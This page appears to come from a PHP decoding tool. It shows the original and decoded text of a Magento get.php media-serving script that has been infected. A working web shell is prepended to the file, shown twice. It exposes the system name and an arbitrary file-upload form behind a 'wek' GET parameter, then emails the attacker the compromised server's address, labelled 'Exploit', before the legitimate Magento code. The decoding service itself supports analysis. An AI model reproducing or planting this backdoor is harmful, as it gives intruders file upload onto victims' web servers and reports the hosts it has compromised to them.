Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if(isset($_GET["wek"])){echo"<font color=darkseagreen>".php_uname()."";echo"<form me..

Decoded Output download

<?php if(isset($_GET["wek"])){echo"<font color=darkseagreen>".php_uname()."";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>Upload Sukses Boss...!!!</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal upload Boss....!!!";}}} 
$to = "[email protected]"; 
$subject = $_SERVER['SERVER_NAME']; 
$header = "From: sHelL<[email protected]>"; 
$message = "Exploit : http://". $_SERVER['SERVER_NAME']. $_SERVER['REQUEST_URI']; 
$sentmail = @mail($to, $subject, $message, $header); 
echo ""; 
exit; 
?> 
<?php 
/** 
 * Magento 
 * 
 * NOTICE OF LICENSE 
 * 
 * This source file is subject to the Open Software License (OSL 3.0) 
 * that is bundled with this package in the file LICENSE.txt. 
 * It is also available through the world-wide-web at this URL: 
 * http://opensource.org/licenses/osl-3.0.php 
 * If you did not receive a copy of the license and are unable to 
 * obtain it through the world-wide-web, please send an email 
 * to [email protected] so we can send you a copy immediately. 
 * 
 * DISCLAIMER 
 * 
 * Do not edit or add to this file if you wish to upgrade Magento to newer 
 * versions in the future. If you wish to customize Magento for your 
 * needs please refer to http://www.magentocommerce.com for more information. 
 * 
 * @category   Mage 
 * @package    Mage 
 * @copyright  Copyright (c) 2008 Irubin Consulting Inc. DBA Varien (http://www.varien.com) 
 * @license    http://opensource.org/licenses/osl-3.0.php  Open Software License (OSL 3.0) 
 */ 
if (version_compare(phpversion(), '5.2.0', '<')===true) { 
    echo  '<div style="font:12px/1.35em arial, helvetica, sans-serif;"><div style="margin:0 0 25px 0; ' 
        . 'border-bottom:1px solid #ccc;"><h3 style="margin:0; font-size:1.7em; font-weight:normal; ' 
        . 'text-transform:none; text-align:left; color:#2f2f2f;">Whoops, it looks like you have an invalid PHP version.' 
        . '</h3></div><p>Magento supports PHP 5.2.0 or newer. <a href="http://www.magentocommerce.com/install" ' 
        . 'target="">Find out</a> how to install</a> Magento using PHP-CGI as a work-around.</p></div>'; 
    exit; 
} 
$start = microtime(true); 
/** 
 * Error reporting 
 */ 
error_reporting(E_ALL | E_STRICT); 
ini_set('display_errors', 0); 
 
$ds = DIRECTORY_SEPARATOR; 
$ps = PATH_SEPARATOR; 
$bp = dirname(__FILE__); 
 
/** 
 * Set include path 
 */ 
 
$paths[] = $bp . $ds . 'app' . $ds . 'code' . $ds . 'local'; 
$paths[] = $bp . $ds . 'app' . $ds . 'code' . $ds . 'community'; 
$paths[] = $bp . $ds . 'app' . $ds . 'code' . $ds . 'core'; 
$paths[] = $bp . $ds . 'lib'; 
 
$appPath = implode($ps, $paths); 
set_include_path($appPath . $ps . get_include_path()); 
 
include_once 'Mage/Core/functions.php'; 
include_once 'Varien/Autoload.php'; 
 
Varien_Autoload::register(); 
 
$varDirectory = $bp . $ds . Mage_Core_Model_Config_Options::VAR_DIRECTORY; 
 
$configCacheFile = $varDirectory . $ds . 'resource_config.json'; 
 
$mediaDirectory = null; 
$allowedResources = array(); 
 
if (file_exists($configCacheFile) && is_readable($configCacheFile)) { 
    $config = json_decode(file_get_contents($configCacheFile), true); 
 
    //checking update time 
    if (filemtime($configCacheFile) + $config['update_time'] > time()) { 
        $mediaDirectory = trim(str_replace($bp . $ds, '', $config['media_directory']), $ds); 
        $allowedResources = array_merge($allowedResources, $config['allowed_resources']); 
    } 
} 
 
$request = new Zend_Controller_Request_Http(); 
 
$pathInfo = str_replace('..', '', ltrim($request->getPathInfo(), '/')); 
 
$filePath = str_replace('/', $ds, rtrim($bp, $ds) . $ds . $pathInfo); 
 
if ($mediaDirectory) { 
    if (0 !== stripos($pathInfo, $mediaDirectory . '/') || is_dir($filePath)) { 
        sendNotFoundPage(); 
    } 
 
    $relativeFilename = str_replace($mediaDirectory . '/', '', $pathInfo); 
    checkResource($relativeFilename, $allowedResources); 
    sendFile($filePath); 
} 
 
$mageFilename = 'app/Mage.php'; 
 
if (!file_exists($mageFilename)) { 
    echo $mageFilename . ' was not found'; 
} 
 
require_once $mageFilename; 
 
umask(0); 
 
/* Store or website code */ 
$mageRunCode = isset($_SERVER['MAGE_RUN_CODE']) ? $_SERVER['MAGE_RUN_CODE'] : ''; 
 
/* Run store or run website */ 
$mageRunType = isset($_SERVER['MAGE_RUN_TYPE']) ? $_SERVER['MAGE_RUN_TYPE'] : 'store'; 
 
if (empty($mediaDirectory)) { 
    Mage::init($mageRunCode, $mageRunType); 
} else { 
    Mage::init( 
        $mageRunCode, 
        $mageRunType, 
        array('cache' => array('disallow_save' => true)), 
        array('Mage_Core') 
    ); 
} 
 
if (!$mediaDirectory) { 
    $config = Mage_Core_Model_File_Storage::getScriptConfig(); 
    $mediaDirectory = str_replace($bp . $ds, '', $config['media_directory']); 
    $allowedResources = array_merge($allowedResources, $config['allowed_resources']); 
 
    $relativeFilename = str_replace($mediaDirectory . '/', '', $pathInfo); 
 
    $fp = fopen($configCacheFile, 'w'); 
    if (flock($fp, LOCK_EX | LOCK_NB)) { 
        ftruncate($fp, 0); 
        fwrite($fp, json_encode($config)); 
    } 
    flock($fp, LOCK_UN); 
    fclose($fp); 
 
    checkResource($relativeFilename, $allowedResources); 
} 
 
if (0 !== stripos($pathInfo, $mediaDirectory . '/')) { 
    sendNotFoundPage(); 
} 
 
try { 
    $databaseFileSotrage = Mage::getModel('core/file_storage_database'); 
    $databaseFileSotrage->loadByFilename($relativeFilename); 
} catch (Exception $e) { 
} 
if ($databaseFileSotrage->getId()) { 
    $directory = dirname($filePath); 
    if (!is_dir($directory)) { 
        mkdir($directory, 0777, true); 
    } 
 
    $fp = fopen($filePath, 'w'); 
    if (flock($fp, LOCK_EX | LOCK_NB)) { 
        ftruncate($fp, 0); 
        fwrite($fp, $databaseFileSotrage->getContent()); 
    } 
    flock($fp, LOCK_UN); 
    fclose($fp); 
} 
 
sendFile($filePath); 
sendNotFoundPage(); 
 
/** 
 * Send 404 
 */ 
function sendNotFoundPage() 
{ 
    header('HTTP/1.0 404 Not Found'); 
    exit; 
} 
 
/** 
 * Check resource by whitelist 
 * 
 * @param string $resource 
 * @param array $allowedResources 
 */ 
function checkResource($resource, array $allowedResources) 
{ 
    $isResourceAllowed = false; 
    foreach ($allowedResources as $allowedResource) { 
        if (0 === stripos($resource, $allowedResource)) { 
            $isResourceAllowed = true; 
        } 
    } 
 
    if (!$isResourceAllowed) { 
        sendNotFoundPage(); 
    } 
} 
/** 
 * Send file to browser 
 * 
 * @param string $file 
 */ 
function sendFile($file) 
{ 
    if (file_exists($file) || is_readable($file)) { 
        $transfer = new Varien_File_Transfer_Adapter_Http(); 
        $transfer->send($file); 
        exit; 
    } 
} 
 ?>

Did this file decode correctly?

Original Code

<?php if(isset($_GET["wek"])){echo"<font color=darkseagreen>".php_uname()."";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>Upload Sukses Boss...!!!</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal upload Boss....!!!";}}}
$to = "[email protected]";
$subject = $_SERVER['SERVER_NAME'];
$header = "From: sHelL<[email protected]>";
$message = "Exploit : http://". $_SERVER['SERVER_NAME']. $_SERVER['REQUEST_URI'];
$sentmail = @mail($to, $subject, $message, $header);
echo "";
exit;
?>
<?php
/**
 * Magento
 *
 * NOTICE OF LICENSE
 *
 * This source file is subject to the Open Software License (OSL 3.0)
 * that is bundled with this package in the file LICENSE.txt.
 * It is also available through the world-wide-web at this URL:
 * http://opensource.org/licenses/osl-3.0.php
 * If you did not receive a copy of the license and are unable to
 * obtain it through the world-wide-web, please send an email
 * to [email protected] so we can send you a copy immediately.
 *
 * DISCLAIMER
 *
 * Do not edit or add to this file if you wish to upgrade Magento to newer
 * versions in the future. If you wish to customize Magento for your
 * needs please refer to http://www.magentocommerce.com for more information.
 *
 * @category   Mage
 * @package    Mage
 * @copyright  Copyright (c) 2008 Irubin Consulting Inc. DBA Varien (http://www.varien.com)
 * @license    http://opensource.org/licenses/osl-3.0.php  Open Software License (OSL 3.0)
 */
if (version_compare(phpversion(), '5.2.0', '<')===true) {
    echo  '<div style="font:12px/1.35em arial, helvetica, sans-serif;"><div style="margin:0 0 25px 0; '
        . 'border-bottom:1px solid #ccc;"><h3 style="margin:0; font-size:1.7em; font-weight:normal; '
        . 'text-transform:none; text-align:left; color:#2f2f2f;">Whoops, it looks like you have an invalid PHP version.'
        . '</h3></div><p>Magento supports PHP 5.2.0 or newer. <a href="http://www.magentocommerce.com/install" '
        . 'target="">Find out</a> how to install</a> Magento using PHP-CGI as a work-around.</p></div>';
    exit;
}
$start = microtime(true);
/**
 * Error reporting
 */
error_reporting(E_ALL | E_STRICT);
ini_set('display_errors', 0);

$ds = DIRECTORY_SEPARATOR;
$ps = PATH_SEPARATOR;
$bp = dirname(__FILE__);

/**
 * Set include path
 */

$paths[] = $bp . $ds . 'app' . $ds . 'code' . $ds . 'local';
$paths[] = $bp . $ds . 'app' . $ds . 'code' . $ds . 'community';
$paths[] = $bp . $ds . 'app' . $ds . 'code' . $ds . 'core';
$paths[] = $bp . $ds . 'lib';

$appPath = implode($ps, $paths);
set_include_path($appPath . $ps . get_include_path());

include_once 'Mage/Core/functions.php';
include_once 'Varien/Autoload.php';

Varien_Autoload::register();

$varDirectory = $bp . $ds . Mage_Core_Model_Config_Options::VAR_DIRECTORY;

$configCacheFile = $varDirectory . $ds . 'resource_config.json';

$mediaDirectory = null;
$allowedResources = array();

if (file_exists($configCacheFile) && is_readable($configCacheFile)) {
    $config = json_decode(file_get_contents($configCacheFile), true);

    //checking update time
    if (filemtime($configCacheFile) + $config['update_time'] > time()) {
        $mediaDirectory = trim(str_replace($bp . $ds, '', $config['media_directory']), $ds);
        $allowedResources = array_merge($allowedResources, $config['allowed_resources']);
    }
}

$request = new Zend_Controller_Request_Http();

$pathInfo = str_replace('..', '', ltrim($request->getPathInfo(), '/'));

$filePath = str_replace('/', $ds, rtrim($bp, $ds) . $ds . $pathInfo);

if ($mediaDirectory) {
    if (0 !== stripos($pathInfo, $mediaDirectory . '/') || is_dir($filePath)) {
        sendNotFoundPage();
    }

    $relativeFilename = str_replace($mediaDirectory . '/', '', $pathInfo);
    checkResource($relativeFilename, $allowedResources);
    sendFile($filePath);
}

$mageFilename = 'app/Mage.php';

if (!file_exists($mageFilename)) {
    echo $mageFilename . ' was not found';
}

require_once $mageFilename;

umask(0);

/* Store or website code */
$mageRunCode = isset($_SERVER['MAGE_RUN_CODE']) ? $_SERVER['MAGE_RUN_CODE'] : '';

/* Run store or run website */
$mageRunType = isset($_SERVER['MAGE_RUN_TYPE']) ? $_SERVER['MAGE_RUN_TYPE'] : 'store';

if (empty($mediaDirectory)) {
    Mage::init($mageRunCode, $mageRunType);
} else {
    Mage::init(
        $mageRunCode,
        $mageRunType,
        array('cache' => array('disallow_save' => true)),
        array('Mage_Core')
    );
}

if (!$mediaDirectory) {
    $config = Mage_Core_Model_File_Storage::getScriptConfig();
    $mediaDirectory = str_replace($bp . $ds, '', $config['media_directory']);
    $allowedResources = array_merge($allowedResources, $config['allowed_resources']);

    $relativeFilename = str_replace($mediaDirectory . '/', '', $pathInfo);

    $fp = fopen($configCacheFile, 'w');
    if (flock($fp, LOCK_EX | LOCK_NB)) {
        ftruncate($fp, 0);
        fwrite($fp, json_encode($config));
    }
    flock($fp, LOCK_UN);
    fclose($fp);

    checkResource($relativeFilename, $allowedResources);
}

if (0 !== stripos($pathInfo, $mediaDirectory . '/')) {
    sendNotFoundPage();
}

try {
    $databaseFileSotrage = Mage::getModel('core/file_storage_database');
    $databaseFileSotrage->loadByFilename($relativeFilename);
} catch (Exception $e) {
}
if ($databaseFileSotrage->getId()) {
    $directory = dirname($filePath);
    if (!is_dir($directory)) {
        mkdir($directory, 0777, true);
    }

    $fp = fopen($filePath, 'w');
    if (flock($fp, LOCK_EX | LOCK_NB)) {
        ftruncate($fp, 0);
        fwrite($fp, $databaseFileSotrage->getContent());
    }
    flock($fp, LOCK_UN);
    fclose($fp);
}

sendFile($filePath);
sendNotFoundPage();

/**
 * Send 404
 */
function sendNotFoundPage()
{
    header('HTTP/1.0 404 Not Found');
    exit;
}

/**
 * Check resource by whitelist
 *
 * @param string $resource
 * @param array $allowedResources
 */
function checkResource($resource, array $allowedResources)
{
    $isResourceAllowed = false;
    foreach ($allowedResources as $allowedResource) {
        if (0 === stripos($resource, $allowedResource)) {
            $isResourceAllowed = true;
        }
    }

    if (!$isResourceAllowed) {
        sendNotFoundPage();
    }
}
/**
 * Send file to browser
 *
 * @param string $file
 */
function sendFile($file)
{
    if (file_exists($file) || is_readable($file)) {
        $transfer = new Varien_File_Transfer_Adapter_Http();
        $transfer->send($file);
        exit;
    }
}

Function Calls

None

Variables

None

Stats

MD5 fca81bebf48ff4c7f77c04b8ae215cd3
Eval Count 0
Decode Time 319 ms